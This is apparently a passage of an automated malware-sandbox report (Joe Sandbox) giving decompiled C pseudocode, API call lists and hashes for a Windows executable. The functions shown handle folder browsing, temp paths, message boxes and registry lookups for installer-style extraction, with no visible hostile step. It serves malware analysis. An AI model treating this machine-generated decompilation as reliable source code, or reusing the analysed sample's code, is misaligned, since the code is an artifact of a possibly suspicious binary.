                                                                                                                                                                                                                                      					_v28 = 0x4088c0;
                                                                                                                                                                                                                                      					 *0x40a288( &_v52);
                                                                                                                                                                                                                                      					_t32 =  *_v12();
                                                                                                                                                                                                                                      					if(_t71 != _t71) {
                                                                                                                                                                                                                                      						asm("int 0x29");
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					_v12 = _t32;
                                                                                                                                                                                                                                      					if(_t32 != 0) {
                                                                                                                                                                                                                                      						 *0x40a288(_t32, 0x4088c0);
                                                                                                                                                                                                                                      						 *_v16();
                                                                                                                                                                                                                                      						if(_t71 != _t71) {
                                                                                                                                                                                                                                      							asm("int 0x29");
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						if( *0x4088c0 != 0) {
                                                                                                                                                                                                                                      							E004016A0(0x4087a0, 0x104, 0x4088c0);
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						 *0x40a288(_v12);
                                                                                                                                                                                                                                      						 *_v20();
                                                                                                                                                                                                                                      						if(_t71 != _t71) {
                                                                                                                                                                                                                                      							asm("int 0x29");
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					FreeLibrary(_t66);
                                                                                                                                                                                                                                      					_t85 =  *0x4087a0; // 0x0
                                                                                                                                                                                                                                      					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					GetTempPathA(0x104, 0x4088c0);
                                                                                                                                                                                                                                      					_t61 = 0x4088c0;
                                                                                                                                                                                                                                      					_t4 =  &(_t61[1]); // 0x4088c1
                                                                                                                                                                                                                                      					_t65 = _t4;
                                                                                                                                                                                                                                      					do {
                                                                                                                                                                                                                                      						_t42 =  *_t61;
                                                                                                                                                                                                                                      						_t61 =  &(_t61[1]);
                                                                                                                                                                                                                                      					} while (_t42 != 0);
                                                                                                                                                                                                                                      					_t5 = _t61 - _t65 + 0x4088c0; // 0x811181
                                                                                                                                                                                                                                      					_t44 = CharPrevA(0x4088c0, _t5);
                                                                                                                                                                                                                                      					_v8 = _t44;
                                                                                                                                                                                                                                      					if( *_t44 == 0x5c &&  *(CharPrevA(0x4088c0, _t44)) != 0x3a) {
                                                                                                                                                                                                                                      						 *_v8 = 0;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      			}




























                                                                                                                                                                                                                                      0x00404214
                                                                                                                                                                                                                                      0x0040421c
                                                                                                                                                                                                                                      0x00404220
                                                                                                                                                                                                                                      0x00404392
                                                                                                                                                                                                                                      0x00404397
                                                                                                                                                                                                                                      0x004043a0
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004043a5
                                                                                                                                                                                                                                      0x0040422c
                                                                                                                                                                                                                                      0x00404232
                                                                                                                                                                                                                                      0x00404237
                                                                                                                                                                                                                                      0x00404384
                                                                                                                                                                                                                                      0x00404385
                                                                                                                                                                                                                                      0x0040438b
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040438b
                                                                                                                                                                                                                                      0x00404243
                                                                                                                                                                                                                                      0x00404249
                                                                                                                                                                                                                                      0x0040424e
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040425a
                                                                                                                                                                                                                                      0x00404260
                                                                                                                                                                                                                                      0x00404265
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040426d
                                                                                                                                                                                                                                      0x00404273
                                                                                                                                                                                                                                      0x004042c6
                                                                                                                                                                                                                                      0x004042c9
                                                                                                                                                                                                                                      0x004042cf
                                                                                                                                                                                                                                      0x004042d4
                                                                                                                                                                                                                                      0x004042d7
                                                                                                                                                                                                                                      0x004042e0
                                                                                                                                                                                                                                      0x004042e7
                                                                                                                                                                                                                                      0x004042ee
                                                                                                                                                                                                                                      0x004042f5
                                                                                                                                                                                                                                      0x004042fc
                                                                                                                                                                                                                                      0x00404302
                                                                                                                                                                                                                                      0x00404306
                                                                                                                                                                                                                                      0x0040430d
                                                                                                                                                                                                                                      0x0040430d
                                                                                                                                                                                                                                      0x0040430f
                                                                                                                                                                                                                                      0x00404314
                                                                                                                                                                                                                                      0x00404323
                                                                                                                                                                                                                                      0x00404329
                                                                                                                                                                                                                                      0x0040432d
                                                                                                                                                                                                                                      0x00404334
                                                                                                                                                                                                                                      0x00404334
                                                                                                                                                                                                                                      0x0040433d
                                                                                                                                                                                                                                      0x0040434e
                                                                                                                                                                                                                                      0x0040434e
                                                                                                                                                                                                                                      0x0040435d
                                                                                                                                                                                                                                      0x00404363
                                                                                                                                                                                                                                      0x00404367
                                                                                                                                                                                                                                      0x0040436e
                                                                                                                                                                                                                                      0x0040436e
                                                                                                                                                                                                                                      0x00404367
                                                                                                                                                                                                                                      0x00404371
                                                                                                                                                                                                                                      0x00404379
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00404275
                                                                                                                                                                                                                                      0x0040427f
                                                                                                                                                                                                                                      0x00404285
                                                                                                                                                                                                                                      0x0040428a
                                                                                                                                                                                                                                      0x0040428a
                                                                                                                                                                                                                                      0x0040428d
                                                                                                                                                                                                                                      0x0040428d
                                                                                                                                                                                                                                      0x0040428f
                                                                                                                                                                                                                                      0x00404290
                                                                                                                                                                                                                                      0x00404296
                                                                                                                                                                                                                                      0x004042a2
                                                                                                                                                                                                                                      0x004042a8
                                                                                                                                                                                                                                      0x004042ae
                                                                                                                                                                                                                                      0x004042c4
                                                                                                                                                                                                                                      0x004042c4
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004042ae

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00404216
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0040422C
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00404243
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0040425A
                                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,004088C0,?,00000001), ref: 0040427F
                                                                                                                                                                                                                                      • CharPrevA.USER32(004088C0,00811181,?,00000001), ref: 004042A2
                                                                                                                                                                                                                                      • CharPrevA.USER32(004088C0,00000000,?,00000001), ref: 004042B6
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00404371
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00404385
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                      • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                      • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                      • Opcode ID: e962d85dd4b6d0bc2e24ac3c071a2a8b3679899d411bf28c89ae7e25fe3f9f4c
                                                                                                                                                                                                                                      • Instruction ID: 0fe09fb55e20a012d0b780b9a6ce4c0d0019ab0acf416bf03c18d9a1fcfbf9ea
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e962d85dd4b6d0bc2e24ac3c071a2a8b3679899d411bf28c89ae7e25fe3f9f4c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4441E2B5A00304AFE711AF609D88A6E7B64AB85384F54417EEA81B73D1CB7C8C05876D
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                                                      			E00404495(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				char _v64;
                                                                                                                                                                                                                                      				char _v576;
                                                                                                                                                                                                                                      				void* _v580;
                                                                                                                                                                                                                                      				struct HWND__* _v584;
                                                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                      				signed int _t34;
                                                                                                                                                                                                                                      				void* _t37;
                                                                                                                                                                                                                                      				signed int _t39;
                                                                                                                                                                                                                                      				intOrPtr _t43;
                                                                                                                                                                                                                                      				signed int _t44;
                                                                                                                                                                                                                                      				signed int _t49;
                                                                                                                                                                                                                                      				signed int _t52;
                                                                                                                                                                                                                                      				void* _t54;
                                                                                                                                                                                                                                      				intOrPtr _t55;
                                                                                                                                                                                                                                      				intOrPtr _t58;
                                                                                                                                                                                                                                      				intOrPtr _t59;
                                                                                                                                                                                                                                      				int _t64;
                                                                                                                                                                                                                                      				void* _t66;
                                                                                                                                                                                                                                      				intOrPtr* _t67;
                                                                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                                                                      				intOrPtr* _t73;
                                                                                                                                                                                                                                      				intOrPtr* _t76;
                                                                                                                                                                                                                                      				intOrPtr* _t77;
                                                                                                                                                                                                                                      				void* _t80;
                                                                                                                                                                                                                                      				void* _t81;
                                                                                                                                                                                                                                      				void* _t82;
                                                                                                                                                                                                                                      				intOrPtr* _t84;
                                                                                                                                                                                                                                      				void* _t85;
                                                                                                                                                                                                                                      				signed int _t89;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t75 = __edx;
                                                                                                                                                                                                                                      				_t34 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                                                      				_v584 = __ecx;
                                                                                                                                                                                                                                      				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                                                      				_t67 = _a4;
                                                                                                                                                                                                                                      				_t69 = 0xd;
                                                                                                                                                                                                                                      				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                                                      				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                                                      				_v580 = _t37;
                                                                                                                                                                                                                                      				asm("movsb");
                                                                                                                                                                                                                                      				if(( *0x408a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                      					_t39 = 1;
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					_v576 = 0;
                                                                                                                                                                                                                                      					LoadStringA( *0x409a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                                                      					if(_v576 != 0) {
                                                                                                                                                                                                                                      						_t73 =  &_v576;
                                                                                                                                                                                                                                      						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                                                      						_t75 = _t16;
                                                                                                                                                                                                                                      						do {
                                                                                                                                                                                                                                      							_t43 =  *_t73;
                                                                                                                                                                                                                                      							_t73 = _t73 + 1;
                                                                                                                                                                                                                                      						} while (_t43 != 0);
                                                                                                                                                                                                                                      						_t84 = _v580;
                                                                                                                                                                                                                                      						_t74 = _t73 - _t75;
                                                                                                                                                                                                                                      						if(_t84 == 0) {
                                                                                                                                                                                                                                      							if(_t67 == 0) {
                                                                                                                                                                                                                                      								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                                                      								_t83 = _t27;
                                                                                                                                                                                                                                      								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                                                      								_t80 = _t44;
                                                                                                                                                                                                                                      								if(_t80 == 0) {
                                                                                                                                                                                                                                      									goto L6;
                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                      									_t75 = _t83;
                                                                                                                                                                                                                                      									_t74 = _t80;
                                                                                                                                                                                                                                      									E004016A0(_t80, _t83,  &_v576);
                                                                                                                                                                                                                                      									goto L23;
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                      								_t76 = _t67;
                                                                                                                                                                                                                                      								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                                                      								_t85 = _t24;
                                                                                                                                                                                                                                      								do {
                                                                                                                                                                                                                                      									_t55 =  *_t76;
                                                                                                                                                                                                                                      									_t76 = _t76 + 1;
                                                                                                                                                                                                                                      								} while (_t55 != 0);
                                                                                                                                                                                                                                      								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                                                      								_t83 = _t25 + _t74;
                                                                                                                                                                                                                                      								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                                                      								_t80 = _t44;
                                                                                                                                                                                                                                      								if(_t80 == 0) {
                                                                                                                                                                                                                                      									goto L6;
                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                      									E0040173E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                      									goto L23;
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                      							_t77 = _t67;
                                                                                                                                                                                                                                      							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                                                      							_t81 = _t18;
                                                                                                                                                                                                                                      							do {
                                                                                                                                                                                                                                      								_t58 =  *_t77;
                                                                                                                                                                                                                                      								_t77 = _t77 + 1;
                                                                                                                                                                                                                                      							} while (_t58 != 0);
                                                                                                                                                                                                                                      							_t75 = _t77 - _t81;
                                                                                                                                                                                                                                      							_t82 = _t84 + 1;
                                                                                                                                                                                                                                      							do {
                                                                                                                                                                                                                                      								_t59 =  *_t84;
                                                                                                                                                                                                                                      								_t84 = _t84 + 1;
                                                                                                                                                                                                                                      							} while (_t59 != 0);
                                                                                                                                                                                                                                      							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                                                      							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                                                      							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                                                      							_t80 = _t44;
                                                                                                                                                                                                                                      							if(_t80 == 0) {
                                                                                                                                                                                                                                      								goto L6;
                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                      								_push(_v580);
                                                                                                                                                                                                                                      								E0040173E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                      								L23:
                                                                                                                                                                                                                                      								MessageBeep(_a12);
                                                                                                                                                                                                                                      								if(E004067CB(_t67) == 0) {
                                                                                                                                                                                                                                      									L25:
                                                                                                                                                                                                                                      									_t49 = 0x10000;
                                                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                                                      									_t54 = E00406777(_t74, _t74);
                                                                                                                                                                                                                                      									_t49 = 0x190000;
                                                                                                                                                                                                                                      									if(_t54 == 0) {
                                                                                                                                                                                                                                      										goto L25;
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      								_t52 = MessageBoxA(_v584, _t80, "OxZQ", _t49 | _a12 | _a16);
                                                                                                                                                                                                                                      								_t83 = _t52;
                                                                                                                                                                                                                                      								LocalFree(_t80);
                                                                                                                                                                                                                                      								_t39 = _t52;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                      						if(E004067CB(_t67) == 0) {
                                                                                                                                                                                                                                      							L4:
                                                                                                                                                                                                                                      							_t64 = 0x10010;
                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                      							_t66 = E00406777(0, 0);
                                                                                                                                                                                                                                      							_t64 = 0x190010;
                                                                                                                                                                                                                                      							if(_t66 == 0) {
                                                                                                                                                                                                                                      								goto L4;
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t44 = MessageBoxA(_v584,  &_v64, "OxZQ", _t64);
                                                                                                                                                                                                                                      						L6:
                                                                                                                                                                                                                                      						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				return E00406C80(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                                                      			}



































                                                                                                                                                                                                                                      0x00404495
                                                                                                                                                                                                                                      0x004044a0
                                                                                                                                                                                                                                      0x004044a7
                                                                                                                                                                                                                                      0x004044b4
                                                                                                                                                                                                                                      0x004044c0
                                                                                                                                                                                                                                      0x004044c7
                                                                                                                                                                                                                                      0x004044ca
                                                                                                                                                                                                                                      0x004044cb
                                                                                                                                                                                                                                      0x004044cb
                                                                                                                                                                                                                                      0x004044cd
                                                                                                                                                                                                                                      0x004044d3
                                                                                                                                                                                                                                      0x004044d4
                                                                                                                                                                                                                                      0x00404657
                                                                                                                                                                                                                                      0x004044da
                                                                                                                                                                                                                                      0x004044e5
                                                                                                                                                                                                                                      0x004044f4
                                                                                                                                                                                                                                      0x00404501
                                                                                                                                                                                                                                      0x0040453e
                                                                                                                                                                                                                                      0x00404544
                                                                                                                                                                                                                                      0x00404544
                                                                                                                                                                                                                                      0x00404547
                                                                                                                                                                                                                                      0x00404547
                                                                                                                                                                                                                                      0x00404549
                                                                                                                                                                                                                                      0x0040454a
                                                                                                                                                                                                                                      0x0040454e
                                                                                                                                                                                                                                      0x00404554
                                                                                                                                                                                                                                      0x00404558
                                                                                                                                                                                                                                      0x004045a7
                                                                                                                                                                                                                                      0x004045e3
                                                                                                                                                                                                                                      0x004045e3
                                                                                                                                                                                                                                      0x004045e9
                                                                                                                                                                                                                                      0x004045ef
                                                                                                                                                                                                                                      0x004045f3
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004045f9
                                                                                                                                                                                                                                      0x004045ff
                                                                                                                                                                                                                                      0x00404602
                                                                                                                                                                                                                                      0x00404604
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00404604
                                                                                                                                                                                                                                      0x004045a9
                                                                                                                                                                                                                                      0x004045a9
                                                                                                                                                                                                                                      0x004045ab
                                                                                                                                                                                                                                      0x004045ab
                                                                                                                                                                                                                                      0x004045ae
                                                                                                                                                                                                                                      0x004045ae
                                                                                                                                                                                                                                      0x004045b0
                                                                                                                                                                                                                                      0x004045b1
                                                                                                                                                                                                                                      0x004045b7
                                                                                                                                                                                                                                      0x004045ba
                                                                                                                                                                                                                                      0x004045bf
                                                                                                                                                                                                                                      0x004045c5
                                                                                                                                                                                                                                      0x004045c9
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004045cf
                                                                                                                                                                                                                                      0x004045d9
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004045de
                                                                                                                                                                                                                                      0x004045c9
                                                                                                                                                                                                                                      0x0040455a
                                                                                                                                                                                                                                      0x0040455a
                                                                                                                                                                                                                                      0x0040455c
                                                                                                                                                                                                                                      0x0040455c
                                                                                                                                                                                                                                      0x0040455f
                                                                                                                                                                                                                                      0x0040455f
                                                                                                                                                                                                                                      0x00404561
                                                                                                                                                                                                                                      0x00404562
                                                                                                                                                                                                                                      0x00404566
                                                                                                                                                                                                                                      0x00404568
                                                                                                                                                                                                                                      0x0040456b
                                                                                                                                                                                                                                      0x0040456b
                                                                                                                                                                                                                                      0x0040456d
                                                                                                                                                                                                                                      0x0040456e
                                                                                                                                                                                                                                      0x00404577
                                                                                                                                                                                                                                      0x0040457a
                                                                                                                                                                                                                                      0x0040457f
                                                                                                                                                                                                                                      0x00404585
                                                                                                                                                                                                                                      0x00404589
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x0040458b
                                                                                                                                                                                                                                      0x0040458b
                                                                                                                                                                                                                                      0x0040459b
                                                                                                                                                                                                                                      0x00404609
                                                                                                                                                                                                                                      0x0040460c
                                                                                                                                                                                                                                      0x00404619
                                                                                                                                                                                                                                      0x0040462a
                                                                                                                                                                                                                                      0x0040462a
                                                                                                                                                                                                                                      0x0040461b
                                                                                                                                                                                                                                      0x0040461c
                                                                                                                                                                                                                                      0x00404623
                                                                                                                                                                                                                                      0x00404628
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00404628
                                                                                                                                                                                                                                      0x00404642
                                                                                                                                                                                                                                      0x00404649
                                                                                                                                                                                                                                      0x0040464b
                                                                                                                                                                                                                                      0x00404651
                                                                                                                                                                                                                                      0x00404651
                                                                                                                                                                                                                                      0x00404589
                                                                                                                                                                                                                                      0x00404503
                                                                                                                                                                                                                                      0x0040450a
                                                                                                                                                                                                                                      0x0040451b
                                                                                                                                                                                                                                      0x0040451b
                                                                                                                                                                                                                                      0x0040450c
                                                                                                                                                                                                                                      0x0040450d
                                                                                                                                                                                                                                      0x00404514
                                                                                                                                                                                                                                      0x00404519
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00404519
                                                                                                                                                                                                                                      0x00404530
                                                                                                                                                                                                                                      0x00404536
                                                                                                                                                                                                                                      0x00404536
                                                                                                                                                                                                                                      0x00404536
                                                                                                                                                                                                                                      0x00404501
                                                                                                                                                                                                                                      0x00404666

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 004044F4
                                                                                                                                                                                                                                      • MessageBoxA.USER32(?,?,OxZQ,00010010), ref: 00404530
                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000065), ref: 0040457F
                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000065), ref: 004045BF
                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000002), ref: 004045E9
                                                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 0040460C
                                                                                                                                                                                                                                      • MessageBoxA.USER32(?,00000000,OxZQ,00000000), ref: 00404642
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 0040464B
                                                                                                                                                                                                                                        • Part of subcall function 004067CB: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0040681A
                                                                                                                                                                                                                                        • Part of subcall function 004067CB: GetSystemMetrics.USER32(0000004A), ref: 00406853
                                                                                                                                                                                                                                        • Part of subcall function 004067CB: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00406878
                                                                                                                                                                                                                                        • Part of subcall function 004067CB: RegQueryValueExA.ADVAPI32(?,00401140,00000000,?,?,0000000C), ref: 004068A0
                                                                                                                                                                                                                                        • Part of subcall function 004067CB: RegCloseKey.ADVAPI32(?), ref: 004068AE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                      • String ID: LoadString() Error. Could not load string resource.$OxZQ
                                                                                                                                                                                                                                      • API String ID: 3244514340-2507965988
                                                                                                                                                                                                                                      • Opcode ID: 2c8d88ff131f5b9ff50b195f6a41ec8eb42ebc087398b6beaafc8bdb07ecbd7f
                                                                                                                                                                                                                                      • Instruction ID: 6befda3f7b24e5e0754560607042e37f5196264a2cf109fbfb7532efec6cb53f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c8d88ff131f5b9ff50b195f6a41ec8eb42ebc087398b6beaafc8bdb07ecbd7f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 065108B1900215AFDB21AF248D08BAB7B69EF85304F1045BAFE05B7281DB39DD05CB58
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                                                      			E00402770(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                                                      				char _v269;
                                                                                                                                                                                                                                      				CHAR* _v276;
                                                                                                                                                                                                                                      				int _v280;
                                                                                                                                                                                                                                      				void* _v284;
                                                                                                                                                                                                                                      				int _v288;
                                                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                                                                      				intOrPtr _t34;
                                                                                                                                                                                                                                      				int _t45;
                                                                                                                                                                                                                                      				int* _t50;
                                                                                                                                                                                                                                      				CHAR* _t52;
                                                                                                                                                                                                                                      				CHAR* _t61;
                                                                                                                                                                                                                                      				char* _t62;
                                                                                                                                                                                                                                      				int _t63;
                                                                                                                                                                                                                                      				CHAR* _t64;
                                                                                                                                                                                                                                      				signed int _t65;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t52 = __ecx;
                                                                                                                                                                                                                                      				_t23 =  *0x408004; // 0xf5e26b31
                                                                                                                                                                                                                                      				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                                                      				_t62 = _a4;
                                                                                                                                                                                                                                      				_t50 = 0;
                                                                                                                                                                                                                                      				_t61 = __ecx;
                                                                                                                                                                                                                                      				_v276 = _t62;
                                                                                                                                                                                                                                      				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                                                      				if( *_t62 != 0x23) {
                                                                                                                                                                                                                                      					_t63 = 0x104;
                                                                                                                                                                                                                                      					goto L14;
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					_t64 = _t62 + 1;
                                                                                                                                                                                                                                      					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                                                      					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                                                      					_t63 = 0x104;
                                                                                                                                                                                                                                      					_t34 = _v269;
                                                                                                                                                                                                                                      					if(_t34 == 0x53) {
                                                                                                                                                                                                                                      						L14:
                                                                                                                                                                                                                                      						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                                                      						goto L15;
                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                      						if(_t34 == 0x57) {
                                                                                                                                                                                                                                      							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                                                      							goto L16;
                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                      							_push(_t52);
                                                                                                                                                                                                                                      							_v288 = 0x104;
                                                                                                                                                                                                                                      							E004017A1( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                                                      							_t59 = 0x104;
                                                                                                                                                                                                                                      							E00406534( &_v268, 0x104, _v276);
                                                                                                                                                                                                                                      							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                                                      								L16:
                                                                                                                                                                                                                                      								_t59 = _t63;
                                                                                                                                                                                                                                      								E00406534(_t61, _t63, _v276);
                                                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                                                      								if(RegQueryValueExA(_v284, 0x401140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                                                      									_t45 = _v280;
                                                                                                                                                                                                                                      									if(_t45 != 2) {
                                                                                                                                                                                                                                      										L9:
                                                                                                                                                                                                                                      										if(_t45 == 1) {
                                                                                                                                                                                                                                      											goto L10;
                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                                                      										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                      											_t45 = _v280;
                                                                                                                                                                                                                                      											goto L9;
                                                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                                                      											_t59 = 0x104;
                                                                                                                                                                                                                                      											E004016A0(_t61, 0x104,  &_v268);
                                                                                                                                                                                                                                      											L10:
                                                                                                                                                                                                                                      											_t50 = 1;
                                                                                                                                                                                                                                      										}
                                                                                                                                                                                                                                      									}
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      								RegCloseKey(_v284);
